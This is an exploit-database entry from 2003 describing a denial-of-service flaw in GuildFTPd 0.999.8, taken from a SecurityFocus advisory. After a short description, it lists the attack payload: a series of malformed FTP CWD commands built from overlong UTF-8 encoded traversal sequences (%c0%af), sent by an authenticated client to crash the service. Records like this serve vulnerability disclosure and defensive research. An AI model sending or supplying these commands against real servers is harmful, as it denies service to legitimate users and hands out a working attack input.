GuildFTPd 0.999.8 - 'CWD' Denial of Service



EKU-ID: 28261 CVE: OSVDB-ID:
Author: dr_insane Published: 2003-05-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/7951/info

A denial of service condition exists in GuildFTPD that may allow a remote user to deny service to legitimate GuildFTPD users.

The denial of service occurs when the server receives several successive malformed CWD commands from an authenticated client.

CWD ..%c0%af....%c0%af....%c0%af....%c0%af....%c0%af....%c0%af..
CWD
\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..CWD /..%c0%af../..%c0%af../